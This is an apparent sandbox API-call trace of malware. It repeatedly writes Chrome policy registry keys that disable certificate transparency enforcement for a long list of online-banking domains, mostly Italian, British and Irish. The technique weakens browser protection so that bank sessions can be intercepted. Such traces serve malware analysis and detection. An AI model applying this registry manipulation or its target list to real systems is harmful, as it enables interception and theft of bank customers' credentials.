	[0192.910] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x578) returned 0x0
	[0192.911] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x580, lpdwDisposition=0x0) returned 0x0
	[0192.911] RegSetValueExA (in: hKey=0x580, lpValueName="196", Reserved=0x0, dwType=0x1, lpData="hb.bancareale.it", cbData=0x10 | out: lpData="hb.bancareale.it") returned 0x0
	[0192.912] RegCloseKey (hKey=0x580) returned 0x0
	[0192.912] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x57c) returned 0x0
	[0192.912] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x584, lpdwDisposition=0x0) returned 0x0
	[0192.912] RegSetValueExA (in: hKey=0x584, lpValueName="197", Reserved=0x0, dwType=0x1, lpData="www.chebanca.it", cbData=0xf | out: lpData="www.chebanca.it") returned 0x0
	[0192.914] RegCloseKey (hKey=0x584) returned 0x0
	[0192.914] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x580) returned 0x0
	[0192.914] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x588, lpdwDisposition=0x0) returned 0x0
	[0192.914] RegSetValueExA (in: hKey=0x588, lpValueName="198", Reserved=0x0, dwType=0x1, lpData="chebanca.it", cbData=0xb | out: lpData="chebanca.it") returned 0x0
	[0192.916] RegCloseKey (hKey=0x588) returned 0x0
	[0192.916] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x584) returned 0x0
	[0192.916] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x58c, lpdwDisposition=0x0) returned 0x0
	[0192.917] RegSetValueExA (in: hKey=0x58c, lpValueName="199", Reserved=0x0, dwType=0x1, lpData="ibk.icbpi.it", cbData=0xc | out: lpData="ibk.icbpi.it") returned 0x0
	[0192.918] RegCloseKey (hKey=0x58c) returned 0x0
	[0192.918] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x588) returned 0x0
	[0192.918] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x590, lpdwDisposition=0x0) returned 0x0
	[0192.918] RegSetValueExA (in: hKey=0x590, lpValueName="200", Reserved=0x0, dwType=0x1, lpData="contact.ubp.com", cbData=0xf | out: lpData="contact.ubp.com") returned 0x0
	[0192.920] RegCloseKey (hKey=0x590) returned 0x0
	[0192.920] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x58c) returned 0x0
	[0192.920] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x594, lpdwDisposition=0x0) returned 0x0
	[0192.920] RegSetValueExA (in: hKey=0x594, lpValueName="201", Reserved=0x0, dwType=0x1, lpData="services2.pbgate.net", cbData=0x14 | out: lpData="services2.pbgate.net") returned 0x0
	[0192.921] RegCloseKey (hKey=0x594) returned 0x0
	[0192.922] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x590) returned 0x0
	[0192.922] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x598, lpdwDisposition=0x0) returned 0x0
	[0192.922] RegSetValueExA (in: hKey=0x598, lpValueName="202", Reserved=0x0, dwType=0x1, lpData="www.gruppocarige.it", cbData=0x13 | out: lpData="www.gruppocarige.it") returned 0x0
	[0192.923] RegCloseKey (hKey=0x598) returned 0x0
	[0192.923] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x594) returned 0x0
	[0192.923] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x59c, lpdwDisposition=0x0) returned 0x0
	[0192.924] RegSetValueExA (in: hKey=0x59c, lpValueName="203", Reserved=0x0, dwType=0x1, lpData="gruppocarige.it", cbData=0xf | out: lpData="gruppocarige.it") returned 0x0
	[0192.925] RegCloseKey (hKey=0x59c) returned 0x0
	[0192.925] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x598) returned 0x0
	[0192.925] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5a0, lpdwDisposition=0x0) returned 0x0
	[0192.925] RegSetValueExA (in: hKey=0x5a0, lpValueName="204", Reserved=0x0, dwType=0x1, lpData="www.e-attijari.net", cbData=0x12 | out: lpData="www.e-attijari.net") returned 0x0
	[0192.927] RegCloseKey (hKey=0x5a0) returned 0x0
	[0192.927] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x59c) returned 0x0
	[0192.927] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5a4, lpdwDisposition=0x0) returned 0x0
	[0192.927] RegSetValueExA (in: hKey=0x5a4, lpValueName="205", Reserved=0x0, dwType=0x1, lpData="e-attijari.net", cbData=0xe | out: lpData="e-attijari.net") returned 0x0
	[0192.928] RegCloseKey (hKey=0x5a4) returned 0x0
	[0192.929] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5a0) returned 0x0
	[0192.929] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5a8, lpdwDisposition=0x0) returned 0x0
	[0192.929] RegSetValueExA (in: hKey=0x5a8, lpValueName="206", Reserved=0x0, dwType=0x1, lpData="servizi.bancaitb.it", cbData=0x13 | out: lpData="servizi.bancaitb.it") returned 0x0
	[0192.930] RegCloseKey (hKey=0x5a8) returned 0x0
	[0192.930] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5a4) returned 0x0
	[0192.930] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5ac, lpdwDisposition=0x0) returned 0x0
	[0192.931] RegSetValueExA (in: hKey=0x5ac, lpValueName="207", Reserved=0x0, dwType=0x1, lpData="myfinance-bpf.mpsa.com", cbData=0x16 | out: lpData="myfinance-bpf.mpsa.com") returned 0x0
	[0192.932] RegCloseKey (hKey=0x5ac) returned 0x0
	[0192.932] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5a8) returned 0x0
	[0192.932] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5b0, lpdwDisposition=0x0) returned 0x0
	[0192.932] RegSetValueExA (in: hKey=0x5b0, lpValueName="208", Reserved=0x0, dwType=0x1, lpData="www.tesoreria.dedagroup.it", cbData=0x1a | out: lpData="www.tesoreria.dedagroup.it") returned 0x0
	[0192.933] RegCloseKey (hKey=0x5b0) returned 0x0
	[0192.933] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5ac) returned 0x0
	[0192.933] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5b4, lpdwDisposition=0x0) returned 0x0
	[0192.933] RegSetValueExA (in: hKey=0x5b4, lpValueName="209", Reserved=0x0, dwType=0x1, lpData="tesoreria.dedagroup.it", cbData=0x16 | out: lpData="tesoreria.dedagroup.it") returned 0x0
	[0192.934] RegCloseKey (hKey=0x5b4) returned 0x0
	[0192.934] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5b0) returned 0x0
	[0192.934] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5b8, lpdwDisposition=0x0) returned 0x0
	[0192.934] RegSetValueExA (in: hKey=0x5b8, lpValueName="210", Reserved=0x0, dwType=0x1, lpData="www.tesoreria.cassacentrale.it", cbData=0x1e | out: lpData="www.tesoreria.cassacentrale.it") returned 0x0
	[0192.935] RegCloseKey (hKey=0x5b8) returned 0x0
	[0192.935] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5b4) returned 0x0
	[0192.935] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5bc, lpdwDisposition=0x0) returned 0x0
	[0192.935] RegSetValueExA (in: hKey=0x5bc, lpValueName="211", Reserved=0x0, dwType=0x1, lpData="tesoreria.cassacentrale.it", cbData=0x1a | out: lpData="tesoreria.cassacentrale.it") returned 0x0
	[0192.936] RegCloseKey (hKey=0x5bc) returned 0x0
	[0192.936] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5b8) returned 0x0
	[0192.936] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5c0, lpdwDisposition=0x0) returned 0x0
	[0192.936] RegSetValueExA (in: hKey=0x5c0, lpValueName="212", Reserved=0x0, dwType=0x1, lpData="carigeonline.gruppocarige.it", cbData=0x1c | out: lpData="carigeonline.gruppocarige.it") returned 0x0
	[0192.937] RegCloseKey (hKey=0x5c0) returned 0x0
	[0192.937] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5bc) returned 0x0
	[0192.937] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5c4, lpdwDisposition=0x0) returned 0x0
	[0192.938] RegSetValueExA (in: hKey=0x5c4, lpValueName="213", Reserved=0x0, dwType=0x1, lpData="tesoreria.cabel.it", cbData=0x12 | out: lpData="tesoreria.cabel.it") returned 0x0
	[0192.938] RegCloseKey (hKey=0x5c4) returned 0x0
	[0192.938] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5c0) returned 0x0
	[0192.939] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5c8, lpdwDisposition=0x0) returned 0x0
	[0192.939] RegSetValueExA (in: hKey=0x5c8, lpValueName="214", Reserved=0x0, dwType=0x1, lpData="servizi.bpsinweb.it", cbData=0x13 | out: lpData="servizi.bpsinweb.it") returned 0x0
	[0192.939] RegCloseKey (hKey=0x5c8) returned 0x0
	[0192.940] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5c4) returned 0x0
	[0192.940] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5cc, lpdwDisposition=0x0) returned 0x0
	[0192.940] RegSetValueExA (in: hKey=0x5cc, lpValueName="215", Reserved=0x0, dwType=0x1, lpData="www.bpiexpressonline.com", cbData=0x18 | out: lpData="www.bpiexpressonline.com") returned 0x0
	[0192.941] RegCloseKey (hKey=0x5cc) returned 0x0
	[0192.941] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5c8) returned 0x0
	[0192.941] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5d0, lpdwDisposition=0x0) returned 0x0
	[0192.941] RegSetValueExA (in: hKey=0x5d0, lpValueName="216", Reserved=0x0, dwType=0x1, lpData="bpiexpressonline.com", cbData=0x14 | out: lpData="bpiexpressonline.com") returned 0x0
	[0192.942] RegCloseKey (hKey=0x5d0) returned 0x0
	[0192.942] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5cc) returned 0x0
	[0192.942] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5d4, lpdwDisposition=0x0) returned 0x0
	[0192.942] RegSetValueExA (in: hKey=0x5d4, lpValueName="217", Reserved=0x0, dwType=0x1, lpData="portale.bancacaripe.it", cbData=0x16 | out: lpData="portale.bancacaripe.it") returned 0x0
	[0192.943] RegCloseKey (hKey=0x5d4) returned 0x0
	[0192.943] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5d0) returned 0x0
	[0192.943] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5d8, lpdwDisposition=0x0) returned 0x0
	[0192.943] RegSetValueExA (in: hKey=0x5d8, lpValueName="218", Reserved=0x0, dwType=0x1, lpData="myhome.gerental.it", cbData=0x12 | out: lpData="myhome.gerental.it") returned 0x0
	[0192.944] RegCloseKey (hKey=0x5d8) returned 0x0
	[0192.944] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5d4) returned 0x0
	[0192.944] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5dc, lpdwDisposition=0x0) returned 0x0
	[0192.944] RegSetValueExA (in: hKey=0x5dc, lpValueName="219", Reserved=0x0, dwType=0x1, lpData="online.crfossano.it", cbData=0x13 | out: lpData="online.crfossano.it") returned 0x0
	[0192.945] RegCloseKey (hKey=0x5dc) returned 0x0
	[0192.945] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5d8) returned 0x0
	[0192.945] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5e0, lpdwDisposition=0x0) returned 0x0
	[0192.945] RegSetValueExA (in: hKey=0x5e0, lpValueName="220", Reserved=0x0, dwType=0x1, lpData="www.caterallenonline.co.uk", cbData=0x1a | out: lpData="www.caterallenonline.co.uk") returned 0x0
	[0192.946] RegCloseKey (hKey=0x5e0) returned 0x0
	[0192.946] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5dc) returned 0x0
	[0192.946] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5e4, lpdwDisposition=0x0) returned 0x0
	[0192.946] RegSetValueExA (in: hKey=0x5e4, lpValueName="221", Reserved=0x0, dwType=0x1, lpData="caterallenonline.co.uk", cbData=0x16 | out: lpData="caterallenonline.co.uk") returned 0x0
	[0192.947] RegCloseKey (hKey=0x5e4) returned 0x0
	[0192.947] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5e0) returned 0x0
	[0192.947] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5e8, lpdwDisposition=0x0) returned 0x0
	[0192.947] RegSetValueExA (in: hKey=0x5e8, lpValueName="222", Reserved=0x0, dwType=0x1, lpData="onlinebusiness.lloydsbank.co.uk", cbData=0x1f | out: lpData="onlinebusiness.lloydsbank.co.uk") returned 0x0
	[0192.948] RegCloseKey (hKey=0x5e8) returned 0x0
	[0192.948] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5e4) returned 0x0
	[0192.948] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5ec, lpdwDisposition=0x0) returned 0x0
	[0192.948] RegSetValueExA (in: hKey=0x5ec, lpValueName="223", Reserved=0x0, dwType=0x1, lpData="ibank.zenith-bank.co.uk", cbData=0x17 | out: lpData="ibank.zenith-bank.co.uk") returned 0x0
	[0192.949] RegCloseKey (hKey=0x5ec) returned 0x0
	[0192.949] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5e8) returned 0x0
	[0192.950] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5f0, lpdwDisposition=0x0) returned 0x0
	[0192.950] RegSetValueExA (in: hKey=0x5f0, lpValueName="224", Reserved=0x0, dwType=0x1, lpData="ibank.gtbankuk.com", cbData=0x12 | out: lpData="ibank.gtbankuk.com") returned 0x0
	[0192.950] RegCloseKey (hKey=0x5f0) returned 0x0
	[0192.951] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5ec) returned 0x0
	[0192.951] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5f4, lpdwDisposition=0x0) returned 0x0
	[0192.951] RegSetValueExA (in: hKey=0x5f4, lpValueName="225", Reserved=0x0, dwType=0x1, lpData="online.bankofcyprus.co.uk", cbData=0x19 | out: lpData="online.bankofcyprus.co.uk") returned 0x0
	[0192.952] RegCloseKey (hKey=0x5f4) returned 0x0
	[0192.952] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5f0) returned 0x0
	[0192.952] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5f8, lpdwDisposition=0x0) returned 0x0
	[0192.952] RegSetValueExA (in: hKey=0x5f8, lpValueName="226", Reserved=0x0, dwType=0x1, lpData="banking.ireland-bank.com", cbData=0x18 | out: lpData="banking.ireland-bank.com") returned 0x0
	[0192.953] RegCloseKey (hKey=0x5f8) returned 0x0
	[0192.953] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x5f4) returned 0x0
	[0192.953] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x5fc, lpdwDisposition=0x0) returned 0x0
	[0192.953] RegSetValueExA (in: hKey=0x5fc, lpValueName="227", Reserved=0x0, dwType=0x1, lpData="bankofirelandlifeonline.ie", cbData=0x1a | out: lpData="bankofirelandlifeonline.ie") returned 0x0
